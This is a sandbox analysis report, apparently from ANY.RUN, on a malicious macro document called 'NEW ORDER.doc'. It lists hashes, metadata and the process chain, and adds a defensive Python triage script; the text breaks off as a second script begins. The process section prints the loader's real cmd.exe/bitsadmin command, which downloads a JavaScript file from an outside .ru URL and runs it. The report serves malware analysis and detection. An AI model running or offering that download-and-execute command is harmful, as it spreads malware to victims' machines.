File name:

NEW ORDER.doc

Full analysis: https://app.any.run/tasks/fda98227-1f0e-4a5b-841c-cd36da11237d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 10, 2019, 16:18:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

B62934A90F6B6AB6A84DDB9478562D1F

SHA1:

A1DF15C01C93D9E6D711ACEC1670A0976BD390D8

SHA256:

584D0949DD689D3D4C825B499D1A093FC9FE274CB8D04B52116B90F994A5753F

SSDEEP:

3072:E92vUDrEWmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxL:EJfBSBUKTrOwl0hsXUEM9o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITSADMIN.EXE for downloading application

      • cmd.exe (PID: 4092)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2860)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2860)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2860)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2860)
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels | Open Office XML Relationships (28.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg | Scalable Vector Graphics (var.3) (4.5)
.xml | Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartName: /_rels/.rels
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartPadding: 512
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataDocumentIgnorable: w14 w15 wp14
PackagePartXmlDataDocumentBodyPRsidR: 001F716E
PackagePartXmlDataDocumentBodyPRsidRDefault: 003B3DF3
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodySectPrRsidR: 001F716E
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartBinaryData: (Binary data 49746 bytes, use -b option to extract)
PackagePartCompression: store
PackagePartXmlDataThemeName: Office Theme
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: MS ゴシック
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: MS 明朝
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 wp14
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.UFFZDAYWDUVDCXK.FLDDVPAKCWCFUOGUYHQP
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.UffzDaYWduvDCXK.FLdDVPAkcwcFUogUYhQP
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataSettingsIgnorable: w14 w15
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsRsidsRsidRootVal: 003B3DF3
PackagePartXmlDataSettingsRsidsRsidVal: 001F716E
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsDocIdVal: {6B02E763-C495-42BF-82DE-678220608874}
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataPropertiesTemplate: Normal.dotm
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesAppVersion: 15
PackagePartXmlDataStylesIgnorable: w14 w15
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesCount: 371
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesCreator: omoba
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesLastModifiedBy: omoba
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:02:19 14:41:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesModified: 2018:02:19 14:41:00Z
PackagePartXmlDataFontsIgnorable: w14 w15
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataWebSettingsIgnorable: w14 w15
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsAllowPNG: -
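The indicators and the dump above say this "NEW ORDER.doc" is not an OLE file at all: MIME text/xml, TRiD "Microsoft Office XML Flat File Format", and exiftool's PackagePart* tags, which are the pkg:part elements of a Flat OPC package. The VBA project of such a document lives in a base64 binary part (vbaProject.bin), and the vbaSuppData block records a docEvents/eventDocOpen entry for the macro PROJECT.UFFZDAYWDUVDCXK.FLDDVPAKCWCFUOGUYHQP, i.e. a Document_Open handler. Anything that keys on the OLE magic at offset 0 misses this. The script below is an added triage example, not ANY.RUN's code: it parses a Flat OPC package, lists VBA parts, checks that the blob really is an OLE container, and reports the auto-run hook and macro names. The two documents in it are constructed for the demo (invented macro name, a VBA blob that is just an OLE header padded with zeros).

```python
"""Triage a Flat OPC Word document for an embedded VBA project and an
auto-run hook (vbaProject.bin part plus vbaSuppData/docEvents/eventDocOpen).

Added example, not ANY.RUN's code. Both sample documents are constructed:
part names follow the Flat OPC convention, the macro name is invented and the
"VBA project" is an OLE header followed by zeros, so everything runs offline.
"""
import base64
import xml.etree.ElementTree as ET

NS = {
    "pkg": "http://schemas.microsoft.com/office/2006/xmlPackage",
    "wne": "http://schemas.microsoft.com/office/word/2006/wordml",
}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # vbaProject.bin is an OLE compound file

# Constructed sample (NOT the real NEW ORDER.doc): a macro document with a
# Document_Open registration, in Flat OPC form.
_FAKE_VBA = base64.b64encode(OLE_MAGIC + b"\x00" * 16).decode()
MACRO_DOC = """<?xml version="1.0" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<pkg:package xmlns:pkg="http://schemas.microsoft.com/office/2006/xmlPackage">
 <pkg:part pkg:name="/word/document.xml" pkg:contentType="application/vnd.ms-word.document.macroEnabled.main+xml">
  <pkg:xmlData><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document></pkg:xmlData>
 </pkg:part>
 <pkg:part pkg:name="/word/vbaProject.bin" pkg:contentType="application/vnd.ms-office.vbaProject" pkg:compression="store">
  <pkg:binaryData>%s</pkg:binaryData>
 </pkg:part>
 <pkg:part pkg:name="/word/vbaData.xml" pkg:contentType="application/vnd.ms-word.vbaData+xml">
  <pkg:xmlData>
   <wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
    <wne:docEvents><wne:eventDocOpen/></wne:docEvents>
    <wne:mcds><wne:mcd wne:macroName="PROJECT.DEMOMODULE.DEMOMACRO" wne:name="Project.DemoModule.DemoMacro" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds>
   </wne:vbaSuppData>
  </pkg:xmlData>
 </pkg:part>
</pkg:package>
""" % _FAKE_VBA

# Constructed control: the same container with no VBA at all.
CLEAN_DOC = """<?xml version="1.0" standalone="yes"?>
<pkg:package xmlns:pkg="http://schemas.microsoft.com/office/2006/xmlPackage">
 <pkg:part pkg:name="/word/document.xml" pkg:contentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml">
  <pkg:xmlData><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document></pkg:xmlData>
 </pkg:part>
</pkg:package>
"""


def triage(xml_text: str) -> dict:
    """Return the facts a first-pass triage of a Flat OPC file wants."""
    root = ET.fromstring(xml_text)
    result = {"flat_opc": root.tag == "{%s}package" % NS["pkg"],
              "vba_parts": [], "vba_is_ole": False, "auto_open": False, "macros": []}
    if not result["flat_opc"]:
        return result
    for part in root.findall("pkg:part", NS):
        name = part.get("{%s}name" % NS["pkg"], "")
        ctype = part.get("{%s}contentType" % NS["pkg"], "")
        # Word stores the VBA project as a base64 binary part with this content type.
        if name.lower().endswith("vbaproject.bin") or ctype == "application/vnd.ms-office.vbaProject":
            result["vba_parts"].append(name)
            data = part.find("pkg:binaryData", NS)
            if data is not None and data.text:
                blob = base64.b64decode("".join(data.text.split()))
                result["vba_is_ole"] = blob.startswith(OLE_MAGIC)
    supp = root.find(".//wne:vbaSuppData", NS)
    if supp is not None:
        # docEvents/eventDocOpen is Word's registration of a Document_Open handler:
        # the macro runs as soon as the user enables content.
        result["auto_open"] = supp.find("wne:docEvents/wne:eventDocOpen", NS) is not None
        result["macros"] = [m.get("{%s}macroName" % NS["wne"])
                            for m in supp.findall("wne:mcds/wne:mcd", NS)]
    return result


def verdict(xml_text: str) -> str:
    r = triage(xml_text)
    if not r["flat_opc"]:
        return "not-flat-opc"
    if r["vba_parts"] and r["auto_open"]:
        return "macro-autorun"
    return "macro" if r["vba_parts"] else "no-macro"


if __name__ == "__main__":
    for label, doc in (("constructed macro doc", MACRO_DOC), ("constructed clean doc", CLEAN_DOC)):
        print(label, "->", verdict(doc), triage(doc))
```

Run it against a suspect file with `verdict(open(path, encoding="utf-8").read())`; the content-type check matters because the part name is attacker-controlled, while the OLE-magic check catches a binaryData part that is not actually a VBA container.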
Total processes: 34
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 0

Behavior graph

start -> WINWORD.EXE (PID 2860) -> cmd.exe (PID 4092) -> bitsadmin.exe (PID 2660)

Process information

PID: 2660
CMD: bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js C:\Users\admin\AppData\Local\Temp\Name.js
Path: C:\Windows\system32\bitsadmin.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149122452 (0x80190194, BG_E_HTTP_ERROR_404: the download target answered 404, matching the HTTP request recorded below)
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
PID: 2860
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW ORDER.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
PID: 4092
CMD: cmd.exe /C CD C: & bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js %TEMP%\Name.js && start %TEMP%\Name.js
Path: C:\Windows\system32\cmd.exe
Parent process: WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452 (the same 0x80190194, propagated from bitsadmin: cmd /C returns the status of the last command it ran, and because "start %TEMP%\Name.js" is chained with &&, it never executed, which is why no Name.js appears among the dropped files)
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
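The three processes above are one chain: Word (opened from explorer) spawns cmd.exe, which runs bitsadmin /transfer to pull a URL into %TEMP% and then start the downloaded script. That shape is the detection opportunity regardless of the URL. The script below is an added example and not part of the ANY.RUN report: it walks process-creation records, flags an Office parent spawning a shell, extracts the URL and destination from any bitsadmin /transfer command line, flags the follow-on "start <script>", and raises severity when an Office application is anywhere in the ancestry. The records are constructed from the report's own command lines and PIDs (explorer's PID and the benign control entry are made up), and the record layout is an assumed Sysmon Event ID 1 subset.

```python
"""Flag the chain recorded in the process table (WINWORD.EXE -> cmd.exe ->
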